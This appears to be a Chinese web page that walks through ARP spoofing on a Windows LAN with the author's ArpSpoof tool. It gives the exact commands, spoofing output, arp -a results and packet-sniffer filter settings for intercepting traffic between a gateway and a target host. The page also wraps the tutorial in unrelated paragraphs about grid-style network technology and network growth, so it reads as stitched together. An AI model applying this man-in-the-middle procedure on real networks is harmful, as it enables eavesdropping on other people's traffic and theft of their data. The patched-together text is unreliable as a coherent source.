|
網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機(jī)整體,實(shí)現(xiàn)資源的全面共享和有機(jī)協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計(jì)算機(jī)、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡(luò)、傳感器等。 當(dāng)前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。 根據(jù)交換環(huán)境中Sniffer實(shí)現(xiàn)的原理(詳見交換環(huán)境下Sniffer的實(shí)現(xiàn)),我寫了一個類似于Linux環(huán)境下的ArpSpoof實(shí)現(xiàn)在Windows環(huán)境下的Arp Sniffer。在交換環(huán)境下Windows中實(shí)現(xiàn)Sniffer需要具備的條件: 1、安裝Winpcap驅(qū)動。 2、我寫了一個類似于Linux環(huán)境下的ArpSpoof(我只在Windows 2000 Server下測試過,其他期待您的測試)。 3、一個Sniffer,如NetXray或者NAI Sniffer Pro(推薦)。 具體的實(shí)現(xiàn)方法: 使用ArpSpoof實(shí)現(xiàn)基于ARP的欺騙: C:\>arpspoof.exe ARPSpoof, by netXeyes, Special Thanks BB www.netXeyes.com 2002, dansnow@21cn.com Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP] 其中Spoof IP1和Spoof IP2是想要進(jìn)行欺騙和嗅探的IP地址,Own IP是自己的IP地址(注意這三個IP必須是在同一個局域網(wǎng)內(nèi)沒有跨越交換機(jī)或者路由器)。 例如目前公司的局域網(wǎng)環(huán)境為192.168.0.xxx,子網(wǎng)掩碼為255.255.255.0,網(wǎng)關(guān)為192.168.0.1。我們的IP為192.168.0.29,想要Sniffer 192.168.0.2的數(shù)據(jù)包。 由于網(wǎng)關(guān)為192.168.0.1,所以我們就只要欺騙192.168.0.1和192.168.0.2就可以了。也就是說告訴192.168.0.1,192.168.0.2的MAC地址是自己(192.168.0.29);然后再告訴192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。這樣以來所有的數(shù)據(jù)包都會發(fā)到192.168.0.29,并且由192.168.0.29實(shí)現(xiàn)轉(zhuǎn)發(fā)(windows 2000默認(rèn)可以進(jìn)行包轉(zhuǎn)發(fā),至于Windows 9.x和Windows NT/XP我沒有測試過,希望您可以告訴我)。 C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29 ARPSpoof, by netXeyes, Special Thanks BB www.netXeyes.com 2002, dansnow@21cn.com Begin Spoof......... Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29 Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29 Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29 Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29 Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29 Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29 ..................................................... 是時候?qū)?92.168.0.1和192.168.0.2的ARP欺騙就開始了,在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一樣的。 C:\>arp -a Interface: 192.168.0.1 on Interface 0x1000004 Internet Address Physical Address Type 192.168.0.2 00-00-86-61-6b-4e dynamic 192.168.0.29 00-00-86-61-6b-4e dynamic 同樣在192.168.0.2上面也會發(fā)現(xiàn)192.168.0.1和192.168.0.29的MAC地址是一樣的。 這樣我們就在192.168.0.1和192.168.0.2之間實(shí)現(xiàn)了ARP欺騙。 啟動Sniffer Pro,在Define Filter里面的Address Type中選擇Hardware(注意不要選為通常的類型IP,否則抓不到什么有意義的東西),Station1和Station2選擇設(shè)置為Any即可。 這時候就開始Sniffer了。 以上結(jié)果在我局域網(wǎng)環(huán)境中測試通過,不保證適用于所有的環(huán)境。 網(wǎng)絡(luò)的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡(luò)的承受能力也面臨著越來越嚴(yán)峻的考驗(yàn)―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......,各項(xiàng)技術(shù)都需要適時應(yīng)勢,對應(yīng)發(fā)展,這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!